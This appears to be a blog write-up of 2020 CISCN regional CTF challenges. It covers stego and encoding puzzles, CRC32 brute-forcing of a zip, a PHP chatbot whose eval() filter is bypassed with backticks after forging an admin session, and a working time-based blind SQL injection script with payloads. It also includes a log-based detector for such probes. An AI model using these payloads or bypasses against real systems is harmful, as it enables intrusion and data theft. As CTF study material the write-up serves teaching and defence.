2020 CISCN East-North China Regional: Reproducing Selected Challenges


Creating together, growing together! This is day 14 of my participation in the Juejin "Daily Update Plan · August Writing Challenge"; click to view the event details.

pikachu

Opening the image in Stegsolve reveals LSB steganography: the red, green and blue channels carry an encoded string. Running zsteg on it directly should work just as well.


It looks like base64, so we run it through a decoder:

pi pi pi pi pi pi pi pi pi pi pika pipi pi pipi pi pi pi pipi pi pi pi pi pi pi pi pipi pi pi pi pi pi pi pi pi pi pi pichu pichu pichu pichu ka chu pipi pipi pipi pipi pi pi pikachu pi pi pi pi pi pi pikachu ka ka ka ka ka ka ka ka ka ka ka pikachu pi pi pi pi pi pi pikachu pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pikachu ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka pikachu pichu ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka pikachu ka ka ka ka pikachu pi pi pikachu pi pi pikachu pipi pikachu pichu ka ka ka ka ka pikachu pipi pi pi pikachu pichu pi pi pi pikachu ka ka ka pikachu pipi pikachu ka ka ka ka ka pikachu pi pi pi pikachu pichu ka pikachu pi pi pi pikachu ka pikachu pipi pi pikachu pikachu pichu pi pikachu ka ka ka pikachu pi pikachu pi pi pi pi pi pi pi pi pikachu ka ka ka ka ka ka pikachu pipi pi pikachu pichu pikachu pipi ka ka ka ka ka pikachu pi pi pi pi pi pikachu pichu ka ka pikachu pi pi pi pi pikachu ka pikachu ka ka ka ka pikachu pi pi pi pi pi pi pi pi pikachu pipi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pikachu 

From experience this is Pikalang (pi ka chu) encoding; we decode it with a dedicated site:

www.dcode.fr/pikalang-la…

snowberg

Opening the file in 010 Editor immediately shows a CRC error. Inspecting the data chunks, we find an AES-encrypted string that we need to decrypt:

U2FsdGVkX1+mMxrc0YkGvTaB0c3A9EgFWvjghqa8j+J4vs0SO8q4qXO+OfKOIih+zOwLBe64L23McubUTe1dxA==

But without the key it cannot be decrypted.

Next, zsteg finds LSB steganography; extracting it (save bin) yields an archive.

It contains four files and requires a password.


Having done similar challenges, we can brute-force the CRC32 of each file (see my earlier article for details).

Script address:

github.com/theonlypwne…

Brute-forcing each file in turn gives the key:

y0u_f0und_th1s_k3y

Decrypt the AES ciphertext with this key and we have the flag.
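Why the CRC32 attack works: a ZIP entry's CRC32 and uncompressed size sit in the unencrypted headers, so for an entry of only a few bytes the set of plaintexts is small enough to enumerate against a 32-bit checksum. The script below is an added example for this write-up (it is not the linked GitHub tool and not the challenge's own files); it builds a constructed in-memory archive as a stand-in, then recovers every entry short enough to brute-force. The alphabet and the 4-byte limit are assumptions chosen to keep the search fast.

```python
import io
import itertools
import zipfile
import zlib

# Assumed candidate alphabet; the key recovered above uses only these characters.
ALPHABET = b"abcdefghijklmnopqrstuvwxyz0123456789_"


def crc32_preimages(target_crc, length, alphabet=ALPHABET):
    """Every `length`-byte string over `alphabet` whose CRC32 equals target_crc.

    For inputs this short the candidate set is far smaller than 2**32, so normally exactly
    one string matches; all matches are returned so a rare collision is visible rather
    than silently picked.
    """
    hits = []
    for combo in itertools.product(alphabet, repeat=length):
        data = bytes(combo)
        if zlib.crc32(data) == target_crc:
            hits.append(data)
    return hits


def build_sample_zip(fragments):
    """Constructed stand-in for the challenge archive: one tiny stored file per fragment."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        for i, frag in enumerate(fragments):
            zf.writestr(f"{i}.txt", frag)
    return buf.getvalue()


def recover_fragments(zip_bytes, alphabet=ALPHABET, max_len=4):
    """Read CRC32 and size from each entry header (readable without the password for
    traditional ZipCrypto archives) and brute-force the entries that are small enough."""
    results = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.file_size > max_len:
                results[info.filename] = None  # too long to enumerate this way
            else:
                results[info.filename] = crc32_preimages(info.CRC, info.file_size, alphabet)
    return results


if __name__ == "__main__":
    # Constructed fragments, not the real challenge files.
    sample = build_sample_zip([b"y0u", b"_f0", b"und", b"_k3"])
    for name, candidates in recover_fragments(sample).items():
        print(name, candidates)
```

This only applies to unencrypted or ZipCrypto-protected entries: the WinZip AES format (AE-2) stores a zero CRC for exactly this reason. The practical lesson for anyone packaging secrets is the same either way: a few-byte secret in its own archive entry is recoverable from the checksum alone.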

old

base encoding -> ROT13 -> W-type rail fence, 3 rails

Decode step by step in that order; a tool can also do it.
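The chain above is easy to get wrong at the rail-fence step, because the W-type (zig-zag) variant distributes characters differently from the plain grid variant. The code below is an added example for this write-up, not the author's tool or the challenge's own data: it implements the 3-rail zig-zag cipher in both directions and chains it with ROT13 and base64 (the page only says "base", so base64 is an assumption).

```python
import base64
import codecs


def rail_fence_pattern(length, rails):
    """Rail index visited by each position when writing in a W (zig-zag) pattern."""
    if rails == 1:
        return [0] * length
    pattern, rail, step = [], 0, 1
    for _ in range(length):
        pattern.append(rail)
        if rail == 0:
            step = 1
        elif rail == rails - 1:
            step = -1
        rail += step
    return pattern


def rail_fence_encrypt(text, rails):
    """Read the zig-zag rail by rail, top to bottom."""
    pat = rail_fence_pattern(len(text), rails)
    return "".join(ch for r in range(rails) for ch, p in zip(text, pat) if p == r)


def rail_fence_decrypt(cipher, rails):
    """Split the ciphertext into per-rail segments, then walk the zig-zag again."""
    pat = rail_fence_pattern(len(cipher), rails)
    counts = [pat.count(r) for r in range(rails)]  # characters that landed on each rail
    segments, pos = [], 0
    for c in counts:
        segments.append(list(cipher[pos:pos + c]))
        pos += c
    return "".join(segments[r].pop(0) for r in pat)


def decode_chain(blob, rails=3):
    """base64 -> ROT13 -> 3-rail W-type rail fence, in the order the write-up lists."""
    text = base64.b64decode(blob).decode()
    text = codecs.decode(text, "rot_13")
    return rail_fence_decrypt(text, rails)


def encode_chain(plain, rails=3):
    """Inverse of decode_chain, useful for building test vectors."""
    text = codecs.encode(rail_fence_encrypt(plain, rails), "rot_13")
    return base64.b64encode(text.encode()).decode()


if __name__ == "__main__":
    sample = encode_chain("flag{r41l_f3nc3_w}")  # constructed sample
    print(sample, "->", decode_chain(sample))
```

The classic textbook vector "WEAREDISCOVEREDFLEEATONCE" -> "WECRLTEERDSOEEFEAOCAIVDEN" (3 rails) is a good sanity check that the zig-zag, not the grid, variant is in use.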

welcomeToCiscn

Press F12 to view the source: the /flag directory contains a flag assembled from character blocks. Mind the letter case.

The chatty CTF bot

Use the image arbitrary file read to read the source of api.php:

```php
<?php
init();

function init() {
    $sesspath = "/tmp/session";
    session_save_path($sesspath);
    session_start();
    if (!$_SESSION['cname'])
        $_SESSION['cname'] = 'ck';
    if (!file_dir_exists("/tmp/resource"))
        mkdir("/tmp/resource");
}

function file_dir_exists($path) {
    $dir = dir($path);
    if ($dir)
        if ($dir->read())
            return true;
    return is_file($path);
}

// Look the user's input up in the uploaded JSON dictionary and act on the matched entry.
function getres($input) {
    log_write($input);
    chdir("/tmp/resource/");
    $path = $_SESSION['cname'];
    if (!file_dir_exists($path)) {
        return "请先上传词库文件。";
    }
    $ck = json_decode(file_get_contents($path), true);
    foreach ($ck as $key => $value) {
        if (strstr($key, $input) or strstr($input, $key)) {
            $type = key($value);
            $v = $value[$type];
            switch ($type) {
                case "string":
                    return $v;
                case "image":
                    $b64img = '<img src="data:image/png;base64,' . base64_encode(file_get_contents($v)) . '"/>';
                    return $b64img;
                case "calc":
                    // Admin-only: the dictionary value is passed to eval() after a
                    // blocklist on parentheses and quotes.
                    if ($_SESSION['is_admin']) {
                        if (preg_match('/\(|\)|\'|"/im', $v)) {
                            return "包含非法字符";
                        }
                        return eval("return $v;");
                    } else {
                        return "admin才能使用这个功能";
                    }
                default:
                    return "这个动作暂时还没能实现";
            }
        }
    }
    return "没有匹配到词库消息";
}

// Dictionary upload: the file name comes from the request and is stored in the session.
function uploadc() {
    $data = $_POST['uploadc'];
    $filename = $_POST['cname'];
    $resourcedir = "/tmp/resource/";
    if (!file_dir_exists($resourcedir))
        mkdir($resourcedir);
    if (strpos($data, "<")) {
        die("别这样！");
    }
    if (strpos($filename, ".")) {
        die("别这样！");
    }
    $_SESSION['cname'] = $filename;
    if (file_put_contents($resourcedir . $filename, $data)) {
        return "上传成功";
    } else {
        return "上传失败";
    }
}

function log_write($msg) {
    $logpath = "log.txt";
    $oper = session_id();
    $opername = substr($oper, 0, 1);
    for ($i = 0; $i <= strlen($oper); $i++)
        $opername .= "*";
    file_put_contents($logpath, "$opername : $msg \n", FILE_APPEND);
}

if (isset($_POST['input']))
    echo getres($_POST['input']);
if (isset($_POST['uploadc']))
    echo uploadc();
if (isset($_POST['clear']))
    file_put_contents("log.txt", "");
if (isset($_GET['log']))
    echo file_get_contents("log.txt");
```

Write a session file through the upload function to gain admin privileges.

The code-execution path filters parentheses and quotes; bypass it with backticks.

Then simply execute commands.

ezsql

Error-based injection with no filtering at all. Note that the flag's table lives in a database different from the site's own, so the column must be explicitly quoted with backticks (and the table qualified with its database); otherwise it doesn't really work.

```python
import requests

# Blind injection driven by sleep(1): when the guessed character is larger than the
# real one the query sleeps and the request times out, which the loop reads as "ascii < mid".
url = 'http://192.168.166.131:58004/app/deleteaccount_status.php?account_status_number='
flag = ''
for i in range(1, 55):
    m = 32
    n = 127
    while True:
        mid = (m + n) // 2
        # Step 1: enumerate databases
        # payload = "1'or if (ascii(substr((select group_concat(schema_name) from information_schema.schemata),{},1))<{},sleep(1),0)%23".format(i, mid)  # ctfshow_flagxc,ctfshow_info
        # -> mysql,information_schema,performance_schema,sys,mims,f0ig_wdp435s

        # Step 2: enumerate tables in f0ig_wdp435s
        # payload = "1'or if (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='f0ig_wdp435s'),{},1))<{},sleep(1),0)%23".format(i, mid)
        # -> account_status,account_type,accounts,customers,customers_sNpe,users

        # Step 3: enumerate columns of fllaaagggg
        # payload = "1'or if (ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='fllaaagggg'),{},1))<{},sleep(1),0)%23".format(i, mid)
        # -> FI@g

        # Step 4: read the flag. The column name needs backticks and the table must be
        # qualified with its database, because it is not the site's current database.
        payload = "1'or if(ascii(substr((select `FI@g` from f0ig_wdp435s.fllaaagggg),{},1))<{},sleep(1),0)%23".format(i, mid)
        print(url + payload)
        try:
            r = requests.get(url=url + payload, timeout=2)
            m = mid  # answered in time: character >= mid
        except requests.exceptions.RequestException:
            n = mid  # timed out: character < mid
        if m + 1 == n:
            flag += chr(m)
            print(flag)
            break
```

Running sqlmap directly shows the column name, but after that it cannot dump the data, for the reason mentioned above. Keep this in mind.
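Seen from the other side of the wire, the script above leaves a very recognisable trail: dozens of requests from one client whose parameter contains `if(ascii(substr(...)),sleep(1),0)`, an `information_schema` reference and a trailing comment, with response times alternating between "instant" and "about one second". The detector below is an added example for this write-up (not part of the original post and not run against its target); the access-log lines are constructed, in combined log format with the request time appended as a final field, and the indicator names are my own.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed access-log lines (combined format + request time in seconds). The second and
# third requests carry the same kind of sleep()-based probe as the script above.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Aug/2022:10:00:01 +0000] "GET /app/deleteaccount_status.php?account_status_number=17 HTTP/1.1" 200 512 0.012
10.0.0.9 - - [12/Aug/2022:10:00:02 +0000] "GET /app/deleteaccount_status.php?account_status_number=1%27or%20if(ascii(substr((select%20schema_name%20from%20information_schema.schemata),1,1))%3C80,sleep(1),0)%23 HTTP/1.1" 200 512 1.004
10.0.0.9 - - [12/Aug/2022:10:00:04 +0000] "GET /app/deleteaccount_status.php?account_status_number=1%27or%20if(ascii(substr((select%20schema_name%20from%20information_schema.schemata),1,1))%3C104,sleep(1),0)%23 HTTP/1.1" 200 512 0.011
10.0.0.7 - - [12/Aug/2022:10:00:05 +0000] "GET /app/profile.php?id=42 HTTP/1.1" 200 2048 0.020
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d+) (?P<size>\d+) (?P<rt>[\d.]+)$'
)

# Indicator name plus the regex applied to the URL-decoded request path.
INDICATORS = [
    ("timing_function", re.compile(r"\b(?:sleep|benchmark|pg_sleep)\s*\(|\bwaitfor\s+delay\b", re.I)),
    ("blind_probe", re.compile(r"\b(?:ascii|ord)\s*\(\s*(?:substr|substring|mid)\s*\(", re.I)),
    ("schema_enum", re.compile(r"\binformation_schema\.", re.I)),
    ("comment_terminator", re.compile(r"(?:#|--\s|/\*)")),
]


def parse_line(line):
    """Split one log line into named fields, or None if it does not match the format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def match_indicators(path):
    """Decode the path the way the database-facing code would see it, then run every indicator."""
    decoded = unquote_plus(path)
    return [name for name, rx in INDICATORS if rx.search(decoded)]


def analyze(log_text, slow_threshold=0.9):
    """One finding per request that trips at least one indicator."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec:
            continue
        hits = match_indicators(rec["path"])
        if hits:
            findings.append({
                "ip": rec["ip"],
                "ts": rec["ts"],
                "indicators": hits,
                # A probe that also took about a second hit the true branch of the sleep().
                "slow": float(rec["rt"]) >= slow_threshold,
            })
    return findings


def per_client(findings):
    """Flagged requests per client IP; a binary search produces dozens in quick succession."""
    return dict(Counter(f["ip"] for f in findings))


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f)
    print(per_client(analyze(SAMPLE_LOG)))
```

The decoding step matters: the payload only becomes readable after `%27`, `%20` and `%23` are unquoted, so rules that match on the raw URL miss it. Detection is the second line; the first is that `deleteaccount_status.php` should bind `account_status_number` as a query parameter instead of concatenating it, after which none of these probes reach the database as SQL.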